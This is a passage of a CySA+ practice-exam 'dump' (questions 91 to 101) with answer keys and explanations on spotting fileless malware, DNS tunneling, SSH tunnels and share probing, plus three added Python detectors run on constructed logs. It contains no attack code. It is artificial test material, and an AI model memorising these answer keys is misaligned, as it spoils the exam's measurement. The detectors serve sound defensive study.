CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 7 Q91-105
Question 91
A SOC analyst observes endpoints creating scheduled tasks that download scripts from untrusted external servers and execute them in memory. The scripts obfuscate their commands and attempt to disable antivirus services. What is the most likely threat, and what should the SOC do first?
A) Routine administrative automation; allow execution.
B) Fileless malware establishing persistence and evading detection; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation tasks; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative automation. Legitimate scripts are documented, signed, and predictable. Scripts that download external files, run entirely in memory, obfuscate commands, and disable antivirus software clearly indicate malicious activity. Ignoring this could allow malware to maintain persistence, execute lateral movement, and exfiltrate sensitive data.
Option B is correct. Fileless malware often uses scheduled tasks to establish persistence while avoiding detection by traditional endpoint security. Indicators include off-hours execution, obfuscation, memory-only execution, and antivirus disabling. Immediate response involves isolating affected endpoints to prevent further compromise, capturing memory for forensic analysis, and examining scripts to understand malware behavior. Network traffic analysis helps identify command-and-control servers. Correlating findings with threat intelligence can provide additional context about attacker infrastructure. Remediation includes cleaning endpoints, restoring security services, updating detection rules, and monitoring other endpoints for similar behavior. Preserving forensic evidence ensures proper investigation, supports regulatory compliance, and improves threat detection.
Option C assumes misconfigured automation. Misconfigurations rarely involve obfuscation, memory-only execution, or disabling antivirus software. Treating this as benign could allow malware to persist undetected.
Option D assumes user testing. Legitimate testing is documented, predictable, and does not involve tampering with security services or executing untrusted scripts. Ignoring malicious activity could result in continued compromise.
Selecting option B ensures early detection, containment, and remediation of sophisticated malware while protecting endpoints and preserving evidence.
Question 92
A SOC analyst identifies multiple Linux endpoints sending repeated DNS queries to newly registered domains with high-entropy subdomains. The queries are low-volume but highly frequent and occur outside business hours. What is the most likely threat, and what is the recommended response?
A) Normal DNS resolution; allow traffic.
B) DNS tunneling used for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Standard DNS queries involve known domains and predictable subdomains. Frequent queries to newly registered domains with high-entropy, dynamically changing subdomains are anomalous and indicate potential malicious activity. Ignoring this could allow attackers to exfiltrate sensitive data covertly.
Option B is correct. DNS tunneling encodes information in DNS queries to bypass security controls and transmit data. Indicators include low-volume but frequent queries, newly registered domains, off-hours activity, and high-entropy subdomains. Immediate SOC response involves capturing DNS traffic for decoding, isolating affected hosts to prevent further exfiltration, and performing endpoint forensics to identify processes responsible. Analysts should correlate logs with threat intelligence to identify attacker infrastructure. Remediation involves cleaning infected endpoints, updating detection mechanisms for DNS tunneling patterns, and monitoring the environment for similar behavior. Preserving forensic evidence ensures effective incident investigation, regulatory compliance, and improved detection of covert threats.
Option C assumes misconfigured DNS servers. Misconfigurations usually result in failed resolutions or predictable errors, not persistent high-entropy queries to unknown domains. Treating this as benign could leave covert malware communications undetected.
Option D assumes antivirus telemetry. Telemetry typically targets known vendor domains and is predictable. Off-hours, frequent queries with high-entropy subdomains are inconsistent with legitimate telemetry activity.
Selecting option B ensures proactive detection, containment, and investigation of covert exfiltration methods while preserving evidence for analysis and future threat mitigation.
Question 93
A SOC analyst observes endpoints executing scripts that modify firewall rules to allow outbound connections to previously blocked IP addresses and disable logging. The scripts are obfuscated and run under elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass network defenses and exfiltrate data; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured security policies; update firewall rules.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes normal administrative activity. Legitimate scripts are predictable, documented, and signed. Scripts that obfuscate execution, disable logging, and modify firewall rules under elevated privileges indicate malicious behavior. Ignoring this could allow attackers to bypass security controls and maintain persistent access.
Option B is correct. Malware frequently modifies firewall rules to establish covert channels for command-and-control or data exfiltration. Indicators include off-hours execution, elevated privileges, log suppression, and obfuscation. Immediate SOC response involves isolating affected endpoints, capturing memory to analyze active processes and scripts, and reviewing network traffic to identify external connections. Analysts should correlate findings with threat intelligence to identify known malicious infrastructure. Remediation includes cleaning endpoints, restoring security and logging services, updating detection rules, and monitoring the environment for similar behavior. Preserving forensic evidence ensures accurate incident investigation, regulatory compliance, and improved detection of evasion techniques.
Option C assumes misconfigured security policies. Misconfigurations rarely involve obfuscation, elevated privileges, or log tampering. Treating this as benign could leave malware undetected.
Option D assumes user testing. Legitimate testing is predictable, documented, and does not involve disabling security services. Ignoring malicious activity risks persistent compromise.
Selecting option B ensures early containment, forensic investigation, and mitigation while protecting critical systems and preserving evidence for future threat prevention.
Question 94
A SOC analyst identifies endpoints repeatedly accessing rarely used network shares, reading portions of files, and attempting unauthorized writes outside business hours. Activity is observed across multiple systems simultaneously. What is the most likely threat, and what is the immediate response?
A) Normal backup activity; allow.
B) Malware performing reconnaissance or lateral movement; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes normal backup activity. Backups are predictable, involve full file access, and use known accounts. Accessing portions of rarely used network shares with unauthorized writes across multiple systems is anomalous. Ignoring this behavior risks lateral movement or reconnaissance by malware.
Option B is correct. Malware often performs lateral movement by probing network shares, attempting partial file access, and executing unauthorized writes to gather credentials or map resources. Immediate SOC response includes isolating affected endpoints to prevent further compromise, reviewing access logs to identify targeted files, and performing endpoint forensics to identify malware or scripts responsible. Analysts should correlate findings with SIEM logs to determine the scope of compromise and any additional impacted systems. Remediation involves cleaning infected endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence ensures thorough investigation, supports regulatory compliance, and enhances threat detection for future incidents.
Option C assumes misconfigured scheduled tasks. Misconfigurations typically affect a limited scope and are predictable. Observed activity across multiple systems is inconsistent with misconfiguration alone.
Option D assumes legitimate off-hours activity. Users rarely access unused shares and attempt unauthorized writes simultaneously. Ignoring suspicious activity risks continued compromise and data exposure.
Selecting option B ensures early detection, containment, and remediation of malware performing reconnaissance or lateral movement, safeguarding sensitive data and maintaining network integrity.
Question 95
A SOC analyst observes Linux endpoints establishing outbound SSH connections on non-standard ports to unknown external IP addresses. Unusual processes are executed, and connections occur continuously outside business hours. What is the most likely threat, and what should the SOC do first?
A) Routine system administration; allow connections.
B) Malicious SSH tunnels used for command-and-control or data exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation scripts; update configuration.
D) Monitoring software; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal system administration. Routine SSH activity is predictable, occurs over known ports, and originates from known hosts. Continuous connections to unknown external IPs over non-standard ports with unusual processes indicate anomalous behavior. Ignoring this could allow attackers to maintain covert access or exfiltrate sensitive data.
Option B is correct. Malicious SSH tunnels are often used to bypass firewall restrictions and maintain covert command-and-control channels. Indicators include off-hours persistent connections, execution of unknown processes, and external IPs without a business relationship. Immediate SOC response involves isolating affected endpoints to prevent lateral movement, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify responsible processes or malware. Analysts should correlate findings with threat intelligence to identify known malicious infrastructure. Remediation includes cleaning infected endpoints, updating firewall and monitoring controls, and scanning other endpoints for similar activity. Preserving forensic evidence ensures proper investigation, regulatory compliance, and improved detection.
Option C assumes misconfigured automation. Misconfigurations rarely produce persistent SSH connections to unknown external hosts. Treating this as benign could allow malware to persist.
Option D assumes monitoring software. Legitimate monitoring uses known servers and predictable ports. Off-hours continuous connections to unknown IPs are inconsistent with normal monitoring behavior.
Selecting option B ensures containment, forensic investigation, and remediation of covert malware activity while safeguarding sensitive data.
Question 96
A SOC analyst detects endpoints executing obfuscated PowerShell scripts that download additional payloads from external servers, disable antivirus services, and modify registry keys to maintain persistence. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Fileless malware leveraging PowerShell for persistence and command-and-control; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured automation scripts; correct configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes normal administrative scripts. Legitimate administrative activity is typically signed, predictable, and documented. Obfuscated scripts that download payloads, disable antivirus software, and modify registry keys clearly indicate malicious behavior. Ignoring this could allow persistent compromise, lateral movement, and potential data exfiltration.
Option B is correct. Fileless malware often uses PowerShell to execute entirely in memory, bypassing traditional security controls. Key indicators include off-hours execution, obfuscation, registry modifications for persistence, antivirus service disruption, and outbound connections to unknown servers. Immediate SOC response involves isolating affected endpoints, capturing memory for forensic analysis, and examining scripts to understand malware functionality and intent. Network traffic analysis can identify command-and-control servers, and correlating logs with threat intelligence helps determine attacker infrastructure. Remediation includes cleaning infected endpoints, restoring security services, updating detection signatures, and monitoring for similar activity. Preserving forensic evidence ensures accurate post-incident investigation, regulatory compliance, and improvement of detection mechanisms.
Option C assumes misconfigured automation scripts. Misconfigurations rarely result in obfuscation, registry changes, or antivirus disabling. Treating this as benign could allow malware persistence.
Option D assumes user testing. Legitimate testing is documented and predictable, without tampering with security controls. Ignoring malicious activity risks continued compromise.
Selecting option B ensures early detection, containment, and forensic investigation while protecting critical systems.
Question 97
A SOC analyst observes Linux endpoints sending persistent, low-volume traffic over non-standard TCP ports to external IPs outside business hours. Traffic is encrypted and not flagged by IDS. What is the most likely threat, and what should the SOC do first?
A) Routine system updates; allow traffic.
B) Malware establishing covert command-and-control channels; isolate endpoints, capture network traffic, and analyze processes.
C) Misconfigured network services; update configuration.
D) Legitimate cloud synchronization; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal system updates. Updates typically occur over known ports to verified vendor servers and are predictable. Low-volume, persistent, encrypted traffic over unusual ports to unknown IPs is inconsistent with routine updates. Ignoring this could allow attackers to maintain covert access, move laterally, or exfiltrate sensitive data.
Option B is correct. Malware frequently uses non-standard ports and encryption to bypass detection while maintaining command-and-control. Indicators include off-hours traffic, persistent low-volume communication, and external IPs outside the business scope. Immediate SOC response involves isolating endpoints to prevent further compromise, capturing network traffic to analyze communication patterns, and performing endpoint forensics to identify responsible processes. Threat intelligence can reveal known malicious infrastructure. Remediation includes cleaning infected endpoints, updating firewall and detection rules, and monitoring other systems. Preserving forensic evidence ensures proper investigation, regulatory compliance, and improved detection capabilities.
Option C assumes misconfigured network services. Misconfigurations usually cause failed connections or errors, not persistent encrypted traffic to unknown hosts. Treating this as benign could leave malware undetected.
Option D assumes legitimate cloud synchronization. Cloud services are predictable and use known domains and standard ports. The observed behavior is inconsistent with normal operations.
Selecting option B ensures containment, forensic analysis, and mitigation of covert malware while protecting sensitive data.
Question 98
A SOC analyst identifies endpoints repeatedly querying newly registered domains with high-entropy subdomains over DNS. Queries are low-volume but highly frequent and occur off-hours. What is the most likely threat, and what is the recommended response?
A) Normal DNS resolution; allow traffic.
B) DNS tunneling for covert data exfiltration; capture traffic, isolate hosts, and decode payloads.
C) Misconfigured DNS servers; update configuration.
D) Antivirus telemetry; verify with vendor.
Answer: B)
Explanation:
Option A assumes normal DNS resolution. Standard queries involve known domains with predictable subdomains. Persistent queries to new domains with high-entropy, dynamically changing subdomains are anomalous and indicate potential malicious activity. Allowing this could enable covert data exfiltration.
Option B is correct. DNS tunneling encodes data in DNS queries to bypass network controls. Indicators include off-hours activity, high-frequency queries, and newly registered domains with high-entropy subdomains. Immediate SOC response involves capturing DNS traffic for decoding, isolating affected hosts to prevent exfiltration, and performing endpoint forensics to identify responsible processes. Correlating with SIEM logs and threat intelligence helps identify attacker infrastructure. Remediation involves cleaning endpoints, updating detection rules, and monitoring for similar activity. Preserving evidence ensures accurate investigation, regulatory compliance, and improved threat detection.
Option C assumes misconfigured DNS servers. Misconfigurations result in failed resolutions or predictable errors, not frequent high-entropy queries. Treating this as benign could leave covert malware undetected.
Option D assumes antivirus telemetry. Telemetry targets known domains and is predictable. Off-hours high-frequency queries with high-entropy subdomains are inconsistent with legitimate telemetry activity.
Selecting option B ensures proactive detection, containment, and investigation of covert exfiltration methods while preserving evidence.
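Questions 92 and 98 describe the same DNS tunneling indicators. The following Python script is an added example, not part of the practice test, that scores constructed DNS query log lines on those indicators: high-entropy subdomains that never repeat, a newly registered parent domain, query volume, and off-hours timing. The log format, the business-hours window, the newly-registered-domain feed, the two-label registered-domain heuristic and all thresholds are assumptions.

```python
import math
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines (format assumed: "ISO-timestamp client qname"); not real traffic.
SAMPLE_DNS_LOG = """\
2024-03-10T02:14:07 10.0.5.21 q7x3k9ma2vb0tzpfw4nd.cdn-sync.example
2024-03-10T02:14:11 10.0.5.21 ab9cz1lm5qe8rtyk2o4p.cdn-sync.example
2024-03-10T02:14:15 10.0.5.21 t3g6w0xp9zkc4uh1sjqe.cdn-sync.example
2024-03-10T02:14:19 10.0.5.21 m8yo2vd5rx7lan3ibfq0.cdn-sync.example
2024-03-10T02:14:23 10.0.5.21 k1pz6hw4cev9soj3tmg8.cdn-sync.example
2024-03-10T02:14:27 10.0.5.21 d4rf8nq2ubx0gyk6lvws.cdn-sync.example
2024-03-10T10:30:01 10.0.5.33 www.example.com
2024-03-10T10:30:02 10.0.5.33 mail.example.com
2024-03-10T10:31:10 10.0.5.33 updates.example.net
"""

# Assumed feed of recently registered domains (in practice: passive DNS or a registrar feed).
NEWLY_REGISTERED = {"cdn-sync.example"}
BUSINESS_HOURS = range(8, 18)   # assumed local working hours
ENTROPY_THRESHOLD = 3.5         # bits per character; random 20-char labels score about 4.3
MIN_QUERIES = 5                 # fewer queries than this is not enough to judge
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(text):
    """Bits of entropy per character; 0 for a single repeated character."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_domain(qname):
    """Split 'a.b.example.com' into ('a.b', 'example.com').

    Assumes the registered domain is the last two labels; production code
    should consult the public suffix list instead."""
    labels = qname.split(".")
    if len(labels) < 3:
        return "", qname
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def detect_dns_tunneling(log_text, newly_registered=NEWLY_REGISTERED):
    """Group queries per (client, registered domain) and return the groups
    that match at least three of the tunneling indicators."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.fromisoformat(m.group(1))
        sub, base = split_domain(m.group(3).lower().rstrip("."))
        groups[(m.group(2), base)].append((ts, sub))

    findings = []
    for (client, base), events in groups.items():
        subs = [sub for _, sub in events if sub]
        if len(subs) < MIN_QUERIES:
            continue
        # Entropy of the leftmost label: that is where tunneled data is encoded.
        avg_entropy = sum(shannon_entropy(s.split(".")[0]) for s in subs) / len(subs)
        off_hours = sum(1 for ts, _ in events if ts.hour not in BUSINESS_HOURS) / len(events)
        reasons = []
        if base in newly_registered:
            reasons.append("newly registered domain")
        if avg_entropy >= ENTROPY_THRESHOLD:
            reasons.append("high-entropy subdomains (%.2f bits/char)" % avg_entropy)
        if len(set(subs)) == len(subs):
            reasons.append("no subdomain repeated (dynamically generated)")
        if off_hours >= 0.8:
            reasons.append("off-hours")
        if len(reasons) >= 3:
            findings.append({"client": client, "domain": base,
                             "queries": len(events), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_dns_tunneling(SAMPLE_DNS_LOG):
        print("%s -> %s: %d queries; %s" % (f["client"], f["domain"],
                                             f["queries"], "; ".join(f["reasons"])))
```

The flagged client and domain are the ones to isolate and capture full DNS traffic for; the normal browsing of the second client never reaches the query threshold.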
Question 99
A SOC analyst observes endpoints accessing rarely used network shares, reading portions of files, and attempting unauthorized writes during off-hours. Activity occurs across multiple systems. What is the most likely threat, and what should the SOC do first?
A) Normal backup activity; allow.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured scheduled tasks; correct configuration.
D) Legitimate off-hours user activity; notify users.
Answer: B)
Explanation:
Option A assumes normal backup activity. Backups involve full file access, predictable schedules, and known accounts. Accessing portions of rarely used shares with unauthorized writes across multiple systems is anomalous. Ignoring this risks lateral movement or reconnaissance by malware.
Option B is correct. Malware often probes network shares to map resources, attempt credential access, and propagate laterally. Indicators include off-hours access, partial file reads, unauthorized writes, and multi-system activity. Immediate SOC response includes isolating affected endpoints, reviewing access logs to determine targeted files, and performing endpoint forensics to identify malware or scripts. Correlation with SIEM logs helps assess the scope and identify additional affected systems. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving evidence ensures thorough investigation, supports regulatory compliance, and improves threat detection for future incidents.
Option C assumes misconfigured scheduled tasks. Misconfigurations usually affect a limited scope and are predictable. Observed multi-system off-hours activity is inconsistent with misconfiguration.
Option D assumes that off-hours activity on a network is legitimate, suggesting that users accessing rarely used shares or performing writes outside normal hours can be considered benign. While some automated processes, maintenance tasks, or scheduled backups do occur off-hours, typical user behavior rarely includes simultaneous access to infrequently used resources combined with unauthorized write attempts. Such activity is anomalous and may indicate malicious behavior rather than routine operations.
Attackers and malware often exploit off-hours periods when monitoring is reduced, using the window to perform reconnaissance, move laterally, or exfiltrate data. Accessing unused shares and attempting unauthorized writes simultaneously is consistent with these tactics, as adversaries seek sensitive resources while avoiding detection. Assuming this activity is normal without verification allows malicious actors to maintain persistence, escalate privileges, or compromise additional systems.
Proper response requires investigation of off-hours anomalies, including reviewing access logs, correlating activity with known schedules, and assessing permissions. Behavioral baselines can help distinguish legitimate operations from suspicious actions. Ignoring unusual off-hours access increases the likelihood of continued compromise and data exposure. Verification and timely remediation are critical to ensuring network security and preventing attackers from exploiting gaps in monitoring or operational assumptions.
Selecting option B ensures early detection, containment, and remediation of malware performing reconnaissance or lateral movement.
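Questions 94 and 99 describe the same share-probing pattern: rarely used shares, partial reads, denied writes, off-hours, several hosts at once. The Python below is an added example, not part of the practice test, that turns those indicators into a correlation rule over constructed file-share audit events. The audit-log field layout, the baseline of normally used shares, the exempt backup account, the 10% partial-read ratio and the 5-minute correlation window are all assumptions.

```python
from datetime import datetime, timedelta

# Constructed audit events (fields assumed: time host user share path op bytes size result).
SAMPLE_SHARE_LOG = r"""
2024-03-10T03:02:10 ws-eng-05 CORP\svc_build \\fs01\legacy-archive q1\contracts.xlsx read 4096 2400000 ok
2024-03-10T03:02:14 ws-eng-05 CORP\svc_build \\fs01\legacy-archive q1\notes.txt write 0 0 denied
2024-03-10T03:03:01 ws-ops-11 CORP\svc_build \\fs01\legacy-archive q2\budget.xlsx read 4096 1800000 ok
2024-03-10T03:03:05 ws-ops-11 CORP\svc_build \\fs01\legacy-archive q2\x.tmp write 0 0 denied
2024-03-10T03:04:20 ws-hr-02 CORP\svc_build \\fs01\hr-old hr\list.csv read 2048 900000 ok
2024-03-10T23:30:00 bkp-01 CORP\svc_backup \\fs01\finance reports\fy.xlsx read 5200000 5200000 ok
2024-03-10T11:15:00 ws-fin-03 CORP\asmith \\fs01\finance reports\fy.xlsx read 5200000 5200000 ok
"""

BASELINE_SHARES = {r"\\fs01\finance", r"\\fs01\eng"}  # assumed shares seen in normal daily use
BACKUP_ACCOUNTS = {r"CORP\svc_backup"}                 # assumed documented backup identity
BUSINESS_HOURS = range(8, 18)
PARTIAL_READ_RATIO = 0.10   # reading under 10% of a file is sampling, not use
WINDOW = timedelta(minutes=5)


def parse_share_log(log_text):
    events = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 9:
            continue
        ts, host, user, share, path, op, nbytes, size, result = parts
        events.append({"time": datetime.fromisoformat(ts), "host": host, "user": user,
                       "share": share, "path": path, "op": op, "bytes": int(nbytes),
                       "size": int(size), "result": result})
    return sorted(events, key=lambda e: e["time"])


def event_indicators(e):
    """Per-event indicators taken from the question text."""
    reasons = []
    if e["share"] not in BASELINE_SHARES:
        reasons.append("rarely used share")
    if e["op"] == "read" and e["size"] > 0 and e["bytes"] < PARTIAL_READ_RATIO * e["size"]:
        reasons.append("partial read")
    if e["op"] == "write" and e["result"] == "denied":
        reasons.append("unauthorized write")
    if e["time"].hour not in BUSINESS_HOURS:
        reasons.append("off-hours")
    return reasons


def detect_share_probing(log_text, min_hosts=2):
    """Return time windows in which at least min_hosts distinct endpoints touched
    rarely used shares with partial reads or denied writes. Backup accounts are exempt
    because full-file reads on a schedule are their normal behaviour (option A)."""
    suspicious = []
    for e in parse_share_log(log_text):
        if e["user"] in BACKUP_ACCOUNTS:
            continue
        r = event_indicators(e)
        if "rarely used share" in r and ("partial read" in r or "unauthorized write" in r):
            suspicious.append(e)

    findings = []
    i = 0
    while i < len(suspicious):
        start = suspicious[i]["time"]
        window = [e for e in suspicious[i:] if e["time"] < start + WINDOW]
        hosts = sorted({e["host"] for e in window})
        if len(hosts) >= min_hosts:
            findings.append({"start": start.isoformat(), "hosts": hosts,
                             "shares": sorted({e["share"] for e in window}),
                             "users": sorted({e["user"] for e in window}),
                             "events": len(window)})
            i += len(window)   # everything in this window has been reported
        else:
            i += 1
    return findings


if __name__ == "__main__":
    for f in detect_share_probing(SAMPLE_SHARE_LOG):
        print("%s: %d events from %s on %s as %s" % (
            f["start"], f["events"], ", ".join(f["hosts"]),
            ", ".join(f["shares"]), ", ".join(f["users"])))
```

A single account appearing on three endpoints inside one window is the cue to validate that account's integrity alongside isolating the hosts, as the remediation paragraph above recommends.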
Question 100
A SOC analyst observes Linux endpoints establishing outbound SSH connections over non-standard ports to unknown external IPs. Unusual processes are executed, and connections persist outside business hours. What is the most likely threat, and what is the immediate response?
A) Routine system administration; allow connections.
B) Malicious SSH tunnels for command-and-control or data exfiltration; isolate endpoints, capture traffic, and analyze processes.
C) Misconfigured automation scripts; update configuration.
D) Monitoring software; verify with vendor.
Answer: B)
Explanation:
Option A assumes routine administration. Normal SSH connections are predictable, use standard ports, and originate from known hosts. Continuous connections to unknown IPs with unusual processes indicate anomalous activity. Ignoring this could allow attackers to maintain covert access or exfiltrate data.
Option B is correct. Malicious SSH tunnels often bypass firewall rules to maintain command-and-control channels or exfiltrate data. Indicators include off-hours persistent connections, execution of unknown processes, and communication with unknown IPs. Immediate SOC response involves isolating affected endpoints, capturing network traffic to analyze communications, and performing endpoint forensics to identify malware or scripts responsible. Correlating findings with threat intelligence can reveal attacker infrastructure. Remediation includes cleaning endpoints, updating firewall and monitoring controls, and scanning other endpoints. Preserving forensic evidence ensures proper investigation and improved detection.
Option C posits that unusual network activity—specifically persistent SSH connections to unknown external hosts—could be the result of misconfigured automation. Automation scripts and scheduled tasks are common in enterprise environments, designed to streamline repetitive operations, maintain system configurations, and perform regular maintenance or monitoring. When misconfigured, these scripts may produce errors, fail to execute, or generate internal network traffic that is somewhat unusual but generally predictable. For instance, a misconfigured backup script might repeatedly attempt to reach an internal storage server, or a maintenance task might produce error logs when dependencies are missing. These behaviors are typically traceable and confined to authorized systems or predictable endpoints, allowing administrators to identify and remediate the issue without major disruption.
Persistent SSH connections to unknown external hosts, however, are highly inconsistent with the expected behavior of misconfigured automation. Automation scripts rarely, if ever, create sustained, long-term connections to external IP addresses that are unknown or unapproved. Such activity is more characteristic of deliberate, unauthorized operations, such as malware establishing a command-and-control channel or an attacker maintaining covert access. SSH connections are particularly significant because they provide full command-line access to a system, enabling remote execution, data exfiltration, and lateral movement. A persistent connection suggests that an entity is intentionally maintaining access over time rather than producing accidental or transient errors caused by misconfiguration.
Treating these connections as benign can introduce significant security risks. Assuming that persistent external SSH activity is the result of a simple script misconfiguration could allow malware or an attacker to remain undetected on the network. This persistence enables ongoing exploitation, potentially allowing sensitive data to be exfiltrated, systems to be used for lateral movement, or additional malware to be deployed. Unlike misconfigured automation, which typically produces observable errors and predictable patterns, malicious activity is deliberate, stealthy, and designed to evade monitoring and forensic detection. Malware may also employ obfuscation, use non-standard ports, or clear logs to conceal its presence, further differentiating it from routine automation errors.
Proper security response requires verification and investigation rather than assumption. Administrators should analyze endpoint behavior, inspect SSH sessions, and correlate network traffic with known configurations and authorized systems. Forensic investigation, including memory analysis and process inspection, may be necessary to identify unauthorized activity. Understanding the source, purpose, and legitimacy of persistent connections is critical to determining whether they are part of routine operations or a potential compromise.
While misconfigured automation can generate network anomalies, persistent SSH connections to unknown external hosts are highly unlikely to be benign. Such behavior strongly suggests malicious activity, and treating it as a routine misconfiguration risks leaving malware operational, allowing continued persistence, data exfiltration, and potential lateral movement. Accurate verification and timely remediation are essential to identify unauthorized activity, secure the network, and prevent ongoing compromise.
Option D assumes monitoring software. Legitimate monitoring uses known servers and predictable ports. Off-hours, persistent connections to unknown IPs are inconsistent with normal monitoring.
Selecting option B ensures containment, forensic analysis, and remediation of covert malware activity while safeguarding sensitive data.
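Questions 95, 97 and 100 all turn on the same covert-channel indicators: an external peer with no business relationship, a non-standard port, off-hours timing, an unexpected client process, and a connection cadence too regular to be a human. The Python below is an added example, not part of the practice test, that measures that cadence (jitter of the inter-connection gaps) over constructed connection log lines; this also covers question 97's encrypted traffic the IDS cannot inspect, since timing needs no payload. The log format, the internal address ranges, the bastion allowlist, the trusted binary paths and the thresholds are assumptions.

```python
import ipaddress
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample log (format assumed: "ISO-timestamp host dst-ip dst-port process").
SAMPLE_CONN_LOG = """\
2024-03-10T01:00:03 srv-web-07 203.0.113.45 2222 /var/tmp/.x/agent
2024-03-10T01:10:02 srv-web-07 203.0.113.45 2222 /var/tmp/.x/agent
2024-03-10T01:20:05 srv-web-07 203.0.113.45 2222 /var/tmp/.x/agent
2024-03-10T01:30:01 srv-web-07 203.0.113.45 2222 /var/tmp/.x/agent
2024-03-10T01:40:04 srv-web-07 203.0.113.45 2222 /var/tmp/.x/agent
2024-03-10T09:12:44 srv-web-03 192.0.2.10 22 /usr/bin/ssh
2024-03-10T14:05:19 srv-web-03 192.0.2.10 22 /usr/bin/ssh
2024-03-10T11:00:00 srv-db-01 10.0.8.5 22 /usr/bin/ssh
"""

# Assumed enterprise address space; anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_SSH_PEERS = {"192.0.2.10"}                # assumed documented external bastion
TRUSTED_BINARIES = ("/usr/bin/", "/usr/sbin/")  # assumed package-managed client paths
STANDARD_SSH_PORT = 22
BUSINESS_HOURS = range(8, 18)
MIN_CONNECTIONS = 4
MAX_JITTER = 0.25   # std-dev / mean of the gaps; a timer-driven beacon sits near 0


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def interval_jitter(timestamps):
    """Coefficient of variation of the gaps between connections, or None if
    there are too few gaps to judge. Human sessions vary widely; beacons do not."""
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return None
    mean = statistics.mean(gaps)
    if mean == 0:
        return None
    return statistics.pstdev(gaps) / mean


def detect_ssh_beacons(log_text):
    """Group connections per (host, destination, port, process) and flag groups
    that show at least three of the indicators from the question text."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, host, dst, port, proc = parts
        groups[(host, dst, int(port), proc)].append(datetime.fromisoformat(ts))

    findings = []
    for (host, dst, port, proc), stamps in groups.items():
        if not is_external(dst) or dst in KNOWN_SSH_PEERS:
            continue
        reasons = []
        if port != STANDARD_SSH_PORT:
            reasons.append("non-standard port %d" % port)
        jitter = interval_jitter(stamps)
        if len(stamps) >= MIN_CONNECTIONS and jitter is not None and jitter <= MAX_JITTER:
            reasons.append("regular interval (jitter %.3f)" % jitter)
        if sum(1 for t in stamps if t.hour not in BUSINESS_HOURS) / len(stamps) >= 0.8:
            reasons.append("off-hours")
        if not proc.startswith(TRUSTED_BINARIES):
            reasons.append("unexpected client binary %s" % proc)
        # One late-night connection to an odd port is a lead, not an alert: require three.
        if len(reasons) >= 3:
            findings.append({"host": host, "dst": dst, "port": port, "process": proc,
                             "connections": len(stamps), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_ssh_beacons(SAMPLE_CONN_LOG):
        print("%s -> %s:%d via %s (%d connections): %s" % (
            f["host"], f["dst"], f["port"], f["process"], f["connections"],
            "; ".join(f["reasons"])))
```

The process path in the finding is what the endpoint forensics step should start from; the bastion traffic from srv-web-03 is skipped by the allowlist, not by its port.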
Question 101
A SOC analyst notices endpoints executing scripts that disable logging services, modify firewall rules, and connect to untrusted external IPs. The scripts are obfuscated and run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass defenses and exfiltrate data; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured firewall rules; update configuration.
D) User testing scripts; notify users.
Answer: B)
Explanation:
Option A assumes normal administrative scripts. Legitimate administrative activity is typically predictable, documented, and often signed to ensure authenticity. Administrative scripts rarely attempt to bypass logging mechanisms, modify firewall rules arbitrarily, or execute obfuscated code under elevated privileges. Treating this behavior as normal could allow persistent malware to maintain covert access, exfiltrate sensitive data, or propagate laterally across the network. Administrative routines are scheduled, follow strict IT operational procedures, and usually produce auditable logs. Ignoring anomalous behavior under the assumption of legitimate administrative activity could lead to a full-scale compromise, where attackers establish persistent command-and-control channels and evade detection systems, increasing the organization’s exposure to breaches and regulatory violations.
